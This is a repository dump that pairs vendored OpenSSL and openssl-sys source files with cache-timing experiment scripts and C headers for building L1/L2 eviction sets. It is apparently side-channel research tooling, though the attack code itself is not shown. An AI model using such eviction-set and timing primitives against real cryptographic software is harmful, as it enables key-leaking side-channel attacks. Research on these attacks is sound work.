File::Spec::Functions; 15 | foreach (@_) { 16 | eval "use $_"; 17 | if ($@) { 18 | unshift @INC, catdir(dirname(__FILE__), 19 | "..", "..", "external", "perl"); 20 | my $transfer = "transfer::$_"; 21 | eval "use $transfer"; 22 | shift @INC; 23 | warn $@ if $@; 24 | } 25 | } 26 | } 27 | 1; 28 | -------------------------------------------------------------------------------- /poc/openssl-src-111.22.0+1.1.1q/openssl/util/unlocal_shlib.com.in: -------------------------------------------------------------------------------- 1 | ${- 2 | use File::Spec::Functions qw(rel2abs); 3 | 4 | my $bldtop = rel2abs($config{builddir}); 5 | our %names = ( map { $_ => $bldtop.$_.".EXE" } 6 | map { $unified_info{sharednames}->{$_} || () } 7 | @{$unified_info{libraries}} ); 8 | "" -} 9 | $ ! Remove the local environment created by local_shlib.com 10 | $ 11 | $ OPENSSL_NAMES := OPENSSL_NAMES_'F$GETJPI("","PID")' 12 | $ IF F$TRNLNM("OSSL_FLAG",OPENSSL_NAMES) .EQS. "" THEN EXIT 0 13 | $ 14 | $ NAMES := {- join(",", keys %names); -} 15 | $ I = 0 16 | $ LOOP: 17 | $ E = F$ELEMENT(I,",",NAMES) 18 | $ I = I + 1 19 | $ IF E .EQS. "," THEN GOTO ENDLOOP 20 | $ OLDV = F$TRNLNM(E,OPENSSL_NAMES) 21 | $ DEASSIGN 'E' 22 | $ IF OLDV .NES. "" THEN DEFINE 'E' 'OLDV' 23 | $ GOTO LOOP 24 | $ ENDLOOP: 25 | $ 26 | $ DEASSIGN 'OPENSSL_NAMES' /TABLE=LNM$PROCESS_DIRECTORY 27 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/.cargo-ok: -------------------------------------------------------------------------------- 1 | ok -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/.cargo_vcs_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "git": { 3 | "sha1": "bbdcaf7c69b66683b34c13f75eaa634e8710efcf" 4 | }, 5 | "path_in_vcs": "openssl-sys" 6 | } -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/Cargo.toml.orig: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "openssl-sys" 3 | version = "0.9.77" 4 | authors = [ 5 | "Alex Crichton ", 6 | "Steven Fackler ", 7 | ] 8 | license = "MIT" 9 | description = "FFI bindings to OpenSSL" 10 | repository = "https://github.com/sfackler/rust-openssl" 11 | readme = "README.md" 12 | categories = ["cryptography", "external-ffi-bindings"] 13 | links = "openssl" 14 | build = "build/main.rs" 15 | 16 | [features] 17 | vendored = ['openssl-src'] 18 | unstable_boringssl = ['bssl-sys'] 19 | 20 | [dependencies] 21 | libc = "0.2" 22 | bssl-sys = { version = "0.1.0", optional = true } 23 | 24 | [build-dependencies] 25 | bindgen = { version = "0.60.1", optional = true } 26 | cc = "1.0" 27 | openssl-src = { version = "111", optional = true } 28 | pkg-config = "0.3.9" 29 | autocfg = "1.0" 30 | 31 | [target.'cfg(target_env = "msvc")'.build-dependencies] 32 | vcpkg = "0.2.8" 33 | 34 | # We don't actually use metadeps for annoying reasons but this is still here for tooling 35 | [package.metadata.pkg-config] 36 | openssl = "1.0.1" 37 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/README.md: -------------------------------------------------------------------------------- 1 | # rust-openssl 2 | 3 | [![crates.io](https://img.shields.io/crates/v/openssl.svg)](https://crates.io/crates/openssl) 4 | 5 | OpenSSL bindings for the Rust programming language. 6 | 7 | [Documentation](https://docs.rs/openssl). 8 | 9 | ## Release Support 10 | 11 | The current supported release of `openssl` is 0.10 and `openssl-sys` is 0.9. 12 | 13 | New major versions will be published at most once per year. After a new 14 | release, the previous major version will be partially supported with bug 15 | fixes for 3 months, after which support will be dropped entirely. 16 | 17 | ### Contribution 18 | 19 | Unless you explicitly state otherwise, any contribution intentionally 20 | submitted for inclusion in the work by you, as defined in the Apache-2.0 21 | license, shall be dual licensed under the terms of both the Apache License, 22 | Version 2.0 and the MIT license without any additional terms or conditions. 23 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/build/find_vendored.rs: -------------------------------------------------------------------------------- 1 | use openssl_src; 2 | use std::path::PathBuf; 3 | 4 | pub fn get_openssl(_target: &str) -> (Vec, PathBuf) { 5 | let artifacts = openssl_src::Build::new().build(); 6 | println!("cargo:vendored=1"); 7 | println!( 8 | "cargo:root={}", 9 | artifacts.lib_dir().parent().unwrap().display() 10 | ); 11 | 12 | ( 13 | vec![artifacts.lib_dir().to_path_buf()], 14 | artifacts.include_dir().to_path_buf(), 15 | ) 16 | } 17 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/aes.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | pub const AES_ENCRYPT: c_int = 1; 4 | pub const AES_DECRYPT: c_int = 0; 5 | 6 | pub const AES_MAXNR: c_int = 14; 7 | pub const AES_BLOCK_SIZE: c_int = 16; 8 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/bn.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | #[cfg(target_pointer_width = "64")] 6 | pub type BN_ULONG = c_ulonglong; 7 | #[cfg(target_pointer_width = "32")] 8 | pub type BN_ULONG = c_uint; 9 | 10 | #[cfg(ossl110)] 11 | pub const BN_FLG_MALLOCED: c_int = 0x01; 12 | #[cfg(ossl110)] 13 | pub const BN_FLG_STATIC_DATA: c_int = 0x02; 14 | #[cfg(ossl110)] 15 | pub const BN_FLG_CONSTTIME: c_int = 0x04; 16 | #[cfg(ossl110)] 17 | pub const BN_FLG_SECURE: c_int = 0x08; 18 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/dtls1.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | cfg_if! { 4 | if #[cfg(ossl300)] { 5 | pub const DTLS1_COOKIE_LENGTH: c_uint = 255; 6 | } else { 7 | pub const DTLS1_COOKIE_LENGTH: c_uint = 256; 8 | } 9 | } 10 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/ec.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use std::ptr; 3 | 4 | use *; 5 | 6 | pub const OPENSSL_EC_NAMED_CURVE: c_int = 1; 7 | 8 | #[cfg(ossl300)] 9 | pub unsafe fn EVP_EC_gen(curve: *const c_char) -> *mut EVP_PKEY { 10 | EVP_PKEY_Q_keygen( 11 | ptr::null_mut(), 12 | ptr::null_mut(), 13 | "EC\0".as_ptr().cast(), 14 | curve, 15 | ) 16 | } 17 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/conf.rs: -------------------------------------------------------------------------------- 1 | use *; 2 | 3 | extern "C" { 4 | pub fn NCONF_new(meth: *mut CONF_METHOD) -> *mut CONF; 5 | pub fn NCONF_default() -> *mut CONF_METHOD; 6 | pub fn NCONF_free(conf: *mut CONF); 7 | } 8 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/hmac.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | cfg_if! { 6 | if #[cfg(any(ossl110, libressl350))] { 7 | extern "C" { 8 | pub fn HMAC_CTX_new() -> *mut HMAC_CTX; 9 | pub fn HMAC_CTX_free(ctx: *mut HMAC_CTX); 10 | } 11 | } else { 12 | extern "C" { 13 | pub fn HMAC_CTX_init(ctx: *mut HMAC_CTX); 14 | pub fn HMAC_CTX_cleanup(ctx: *mut HMAC_CTX); 15 | } 16 | } 17 | } 18 | 19 | extern "C" { 20 | pub fn HMAC_Init_ex( 21 | ctx: *mut HMAC_CTX, 22 | key: *const c_void, 23 | len: c_int, 24 | md: *const EVP_MD, 25 | impl_: *mut ENGINE, 26 | ) -> c_int; 27 | pub fn HMAC_Update(ctx: *mut HMAC_CTX, data: *const c_uchar, len: size_t) -> c_int; 28 | pub fn HMAC_Final(ctx: *mut HMAC_CTX, md: *mut c_uchar, len: *mut c_uint) -> c_int; 29 | pub fn HMAC_CTX_copy(dst: *mut HMAC_CTX, src: *mut HMAC_CTX) -> c_int; 30 | } 31 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/kdf.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use *; 3 | 4 | cfg_if! { 5 | if #[cfg(ossl300)] { 6 | extern "C" { 7 | pub fn EVP_PKEY_CTX_set_hkdf_mode(ctx: *mut EVP_PKEY_CTX, mode: c_int) -> c_int; 8 | pub fn EVP_PKEY_CTX_set_hkdf_md(ctx: *mut EVP_PKEY_CTX, md: *const EVP_MD) -> c_int; 9 | pub fn EVP_PKEY_CTX_set1_hkdf_salt( 10 | ctx: *mut EVP_PKEY_CTX, 11 | salt: *const u8, 12 | saltlen: c_int, 13 | ) -> c_int; 14 | pub fn EVP_PKEY_CTX_set1_hkdf_key( 15 | ctx: *mut EVP_PKEY_CTX, 16 | key: *const u8, 17 | keylen: c_int, 18 | ) -> c_int; 19 | pub fn EVP_PKEY_CTX_add1_hkdf_info( 20 | ctx: *mut EVP_PKEY_CTX, 21 | info: *const u8, 22 | infolen: c_int, 23 | ) -> c_int; 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/provider.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use *; 3 | 4 | extern "C" { 5 | #[cfg(ossl300)] 6 | pub fn OSSL_PROVIDER_load(ctx: *mut OSSL_LIB_CTX, name: *const c_char) -> *mut OSSL_PROVIDER; 7 | #[cfg(ossl300)] 8 | pub fn OSSL_PROVIDER_try_load( 9 | ctx: *mut OSSL_LIB_CTX, 10 | name: *const c_char, 11 | retain_fallbacks: c_int, 12 | ) -> *mut OSSL_PROVIDER; 13 | #[cfg(ossl300)] 14 | pub fn OSSL_PROVIDER_unload(prov: *mut OSSL_PROVIDER) -> c_int; 15 | } 16 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/rand.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | extern "C" { 4 | pub fn RAND_bytes(buf: *mut u8, num: c_int) -> c_int; 5 | 6 | #[cfg(ossl111)] 7 | pub fn RAND_keep_random_devices_open(keep: c_int); 8 | 9 | pub fn RAND_status() -> c_int; 10 | 11 | pub fn RAND_add(buf: *const c_void, num: c_int, randomness: c_double); 12 | } 13 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/safestack.rs: -------------------------------------------------------------------------------- 1 | stack!(stack_st_OPENSSL_STRING); 2 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/srtp.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use *; 3 | 4 | extern "C" { 5 | pub fn SSL_CTX_set_tlsext_use_srtp(ctx: *mut SSL_CTX, profiles: *const c_char) -> c_int; 6 | pub fn SSL_set_tlsext_use_srtp(ssl: *mut SSL, profiles: *const c_char) -> c_int; 7 | 8 | pub fn SSL_get_srtp_profiles(ssl: *mut SSL) -> *mut stack_st_SRTP_PROTECTION_PROFILE; 9 | pub fn SSL_get_selected_srtp_profile(ssl: *mut SSL) -> *mut SRTP_PROTECTION_PROFILE; 10 | } 11 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/handwritten/tls1.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use *; 3 | 4 | extern "C" { 5 | pub fn SSL_get_servername(ssl: *const SSL, name_type: c_int) -> *const c_char; 6 | 7 | pub fn SSL_export_keying_material( 8 | s: *mut SSL, 9 | out: *mut c_uchar, 10 | olen: size_t, 11 | label: *const c_char, 12 | llen: size_t, 13 | context: *const c_uchar, 14 | contextlen: size_t, 15 | use_context: c_int, 16 | ) -> c_int; 17 | 18 | #[cfg(ossl111)] 19 | pub fn SSL_export_keying_material_early( 20 | s: *mut ::SSL, 21 | out: *mut c_uchar, 22 | olen: size_t, 23 | label: *const c_char, 24 | llen: size_t, 25 | context: *const c_uchar, 26 | contextlen: size_t, 27 | ) -> c_int; 28 | } 29 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/pem.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | pub const PEM_R_NO_START_LINE: c_int = 108; 6 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/pkcs7.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | pub const PKCS7_TEXT: c_int = 0x1; 6 | pub const PKCS7_NOCERTS: c_int = 0x2; 7 | pub const PKCS7_NOSIGS: c_int = 0x4; 8 | pub const PKCS7_NOCHAIN: c_int = 0x8; 9 | pub const PKCS7_NOINTERN: c_int = 0x10; 10 | pub const PKCS7_NOVERIFY: c_int = 0x20; 11 | pub const PKCS7_DETACHED: c_int = 0x40; 12 | pub const PKCS7_BINARY: c_int = 0x80; 13 | pub const PKCS7_NOATTR: c_int = 0x100; 14 | pub const PKCS7_NOSMIMECAP: c_int = 0x200; 15 | pub const PKCS7_NOOLDMIMETYPE: c_int = 0x400; 16 | pub const PKCS7_CRLFEOL: c_int = 0x800; 17 | pub const PKCS7_STREAM: c_int = 0x1000; 18 | pub const PKCS7_NOCRL: c_int = 0x2000; 19 | pub const PKCS7_PARTIAL: c_int = 0x4000; 20 | pub const PKCS7_REUSE_DIGEST: c_int = 0x8000; 21 | #[cfg(not(any(ossl101, ossl102, libressl)))] 22 | pub const PKCS7_NO_DUAL_CONTENT: c_int = 0x10000; 23 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/srtp.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | pub const SRTP_AES128_CM_SHA1_80: c_ulong = 0x0001; 6 | pub const SRTP_AES128_CM_SHA1_32: c_ulong = 0x0002; 7 | pub const SRTP_AES128_F8_SHA1_80: c_ulong = 0x0003; 8 | pub const SRTP_AES128_F8_SHA1_32: c_ulong = 0x0004; 9 | pub const SRTP_NULL_SHA1_80: c_ulong = 0x0005; 10 | pub const SRTP_NULL_SHA1_32: c_ulong = 0x0006; 11 | 12 | /* AEAD SRTP protection profiles from RFC 7714 */ 13 | #[cfg(ossl110)] 14 | pub const SRTP_AEAD_AES_128_GCM: c_ulong = 0x0007; 15 | #[cfg(ossl110)] 16 | pub const SRTP_AEAD_AES_256_GCM: c_ulong = 0x0008; 17 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/ssl3.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | pub const SSL3_VERSION: c_int = 0x300; 4 | 5 | pub const SSL3_AD_ILLEGAL_PARAMETER: c_int = 47; 6 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/types.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | use *; 3 | 4 | cfg_if! { 5 | if #[cfg(any(ossl110, libressl280))] { 6 | pub enum EVP_PKEY {} 7 | } else { 8 | #[repr(C)] 9 | pub struct EVP_PKEY { 10 | pub type_: c_int, 11 | pub save_type: c_int, 12 | pub references: c_int, 13 | pub ameth: *const EVP_PKEY_ASN1_METHOD, 14 | pub engine: *mut ENGINE, 15 | pub pkey: *mut c_void, 16 | pub save_parameters: c_int, 17 | pub attributes: *mut stack_st_X509_ATTRIBUTE, 18 | } 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /poc/openssl-sys-0.9.77/src/x509.rs: -------------------------------------------------------------------------------- 1 | use libc::*; 2 | 3 | use *; 4 | 5 | pub const X509_FILETYPE_PEM: c_int = 1; 6 | pub const X509_FILETYPE_ASN1: c_int = 2; 7 | pub const X509_FILETYPE_DEFAULT: c_int = 3; 8 | 9 | pub const ASN1_R_HEADER_TOO_LONG: c_int = 123; 10 | 11 | cfg_if! { 12 | if #[cfg(not(any(ossl110, libressl350)))] { 13 | pub const X509_LU_FAIL: c_int = 0; 14 | pub const X509_LU_X509: c_int = 1; 15 | pub const X509_LU_CRL: c_int = 2; 16 | } 17 | } 18 | -------------------------------------------------------------------------------- /re/addrsweep.sh: -------------------------------------------------------------------------------- 1 | #!/bin/zsh 2 | 3 | stride=$1; shift # stride of each sweep 4 | sweep_times=$1; shift # number of sweeps 5 | data_buf_boundary=$1; shift # start of the sweep address 6 | trials=$1; shift # number of trials 7 | BIN=./src/addr_sweep.out # exp binary 8 | core_id=4 # 4-7 p core 9 | 10 | # renew out directory 11 | rm -rf out 12 | mkdir -p out 13 | 14 | data_file_directory="../data/addrsweep/${data_buf_boundary}_${stride}_${sweep_times}" 15 | mkdir -p $data_file_directory 16 | 17 | # test start 18 | trial=0 19 | while [[ $trial -lt $trials ]]; do 20 | outdir="${data_file_directory}/${trial}" 21 | mkdir -p $outdir 22 | echo "$trial / $trials" 23 | successful=0 24 | while [[ $successful -eq 0 ]]; do 25 | successful=1 26 | sudo $BIN $core_id \ 27 | $stride $sweep_times $data_buf_boundary \ 28 | || successful=0 29 | done 30 | 31 | mv -f out/* "${outdir}/" 32 | ((trial+=1)) 33 | sleep 1 34 | done 35 | -------------------------------------------------------------------------------- /re/init.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # increase stack size to avoid segfault 4 | ulimit -s 65520 5 | 6 | # create data directory 7 | cd .. 8 | mkdir -p data 9 | cd re 10 | 11 | # build experiments 12 | cd src 13 | make 14 | 15 | # run cache experiments 16 | sudo ./evset_gen.out 17 | -------------------------------------------------------------------------------- /re/src/lib/basics/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | SOURCES=$(shell find . -name '*.c') 3 | OBJECTS=$(SOURCES:.c=.o) 4 | 5 | CFLAGS=-O2 -Wall -fPIC -g 6 | LDFLAGS=-lm 7 | 8 | all: $(OBJECTS) 9 | 10 | %.o: %.c 11 | $(CC) $(CFLAGS) -c $< -o $@ 12 | 13 | clean: 14 | rm -rf $(OBJECTS) 15 | -------------------------------------------------------------------------------- /re/src/lib/basics/linked_list.h: -------------------------------------------------------------------------------- 1 | #ifndef __LINKED_LIST_H__ 2 | #define __LINKED_LIST_H__ 3 | 4 | #include 5 | #include 6 | 7 | // one node is 8B + 8B = 16B = 0x10B 8 | typedef struct node_t { 9 | struct node_t* next; 10 | struct node_t* last; 11 | } node_t; 12 | 13 | typedef struct { 14 | node_t* head; 15 | node_t* tail; 16 | int num_nodes; 17 | } linked_list_t; 18 | 19 | linked_list_t* create_linked_list(); 20 | 21 | // only delete the linked list. don't actually delete the nodes 22 | void delete_linked_list(linked_list_t* linked_list); 23 | 24 | // delete the nodes and the linked list. 25 | // this method shouldn't be used in the eviction set creation 26 | void deep_delete_linked_list(linked_list_t* linked_list); 27 | 28 | void add_preallocated_node_to_linked_list(linked_list_t* linked_list, node_t* new_node_addr); 29 | 30 | #endif 31 | -------------------------------------------------------------------------------- /re/src/lib/basics/math_utils.h: -------------------------------------------------------------------------------- 1 | #ifndef __MATH_UTILS_H__ 2 | #define __MATH_UTILS_H__ 3 | 4 | void shuffle(void* array, int num_elements, int element_size); 5 | 6 | void sort(void* array, int num_elements, int element_size); 7 | 8 | int max(int a, int b); 9 | 10 | int min(int a, int b); 11 | 12 | float max_f(float* arr, int n); 13 | 14 | float min_f(float* arr, int n); 15 | 16 | float mean_f(float* arr, int n); 17 | 18 | float median_f(float* arr, int n); 19 | 20 | float std_f(float* arr, int n); 21 | 22 | float q1_f(float* arr, int n); 23 | 24 | float q3_f(float* arr, int n); 25 | 26 | uint64_t max_8B(uint64_t* arr, int n); 27 | 28 | uint64_t min_8B(uint64_t* arr, int n); 29 | 30 | float mean_8B(uint64_t* arr, int n); 31 | 32 | uint64_t median_8B(uint64_t* arr, int n); 33 | 34 | float std_8B(uint64_t* arr, int n); 35 | 36 | uint64_t q1_8B(uint64_t* arr, int n); 37 | 38 | uint64_t q3_8B(uint64_t* arr, int n); 39 | 40 | #endif 41 | -------------------------------------------------------------------------------- /re/src/lib/eviction_set/Makefile: -------------------------------------------------------------------------------- 1 | CC=clang 2 | 3 | SOURCES=$(shell find . -name '*.c') 4 | OBJECTS=$(SOURCES:.c=.o) 5 | 6 | CFLAGS=-O2 -g -Wall -fPIC 7 | 8 | 9 | all: $(OBJECTS) 10 | 11 | %.o: %.c 12 | $(CC) $(CFLAGS) -c $< -o $@ 13 | 14 | clean: 15 | rm -rf $(OBJECTS) 16 | -------------------------------------------------------------------------------- /re/src/lib/eviction_set/eviction_set.h: -------------------------------------------------------------------------------- 1 | #ifndef __EVICTION_SET_H__ 2 | #define __EVICTION_SET_H__ 3 | 4 | #include "../basics/allocator.h" 5 | #include "../basics/cache_line_set.h" 6 | #include "../basics/linked_list.h" 7 | 8 | #include 9 | 10 | #define NUM_TESTS 100 11 | 12 | // the eviction set consists of a linked list of cache lines 13 | // that can be traversed multiple times in an attempt to evict 14 | // certain cache lines 15 | typedef struct { 16 | linked_list_t* list_of_cachelines; 17 | } eviction_set_t; 18 | 19 | extern uint8_t global_junk; 20 | 21 | eviction_set_t* create_eviction_set(cache_line_set_t* cache_line_set); 22 | 23 | void delete_eviction_set(eviction_set_t* eviction_set); 24 | 25 | void print_eviction_set(eviction_set_t* eviction_set); 26 | 27 | void add_line_to_eviction_set(eviction_set_t* eviction_set, size_t cache_line_addr); 28 | 29 | uint8_t traverse_eviction_set(eviction_set_t* eviction_set); 30 | 31 | uint64_t evict_and_time(uint8_t* victim_addr, cache_line_set_t* cache_line_set); 32 | 33 | #endif 34 | -------------------------------------------------------------------------------- /re/src/lib/eviction_set/eviction_set_generation.h: -------------------------------------------------------------------------------- 1 | #ifndef __EVICTION_SET_GENERATION_H__ 2 | #define __EVICTION_SET_GENERATION_H__ 3 | 4 | #include 5 | #include "../basics/cache_line_set.h" 6 | // #define DEBUG 7 | 8 | #ifdef DEBUG 9 | #define _dprintf printf 10 | #else 11 | #define _dprintf(...) 12 | #endif 13 | // Find L1 eviction set by ensuring congruent page offsets 14 | cache_line_set_t* find_L1_eviction_set(uint8_t* victim_addr); 15 | // this function outputs a set of cache lines (with size = set_size) that map to the same L1 set as victim_addr 16 | cache_line_set_t* find_L1_congruent_cache_lines(uint8_t* victim_addr, int set_size); 17 | 18 | // this function outputs a set of cache lines that map to the same L2 set as victim_addr, using the classic algorithm 19 | // the output set is a good eviction set for victim_addr, and the set size is exactly L2_NWAYS 20 | cache_line_set_t* find_L2_eviction_set_using_timer(uint8_t* victim_addr); 21 | #endif 22 | --------------------------------------------------------------------------------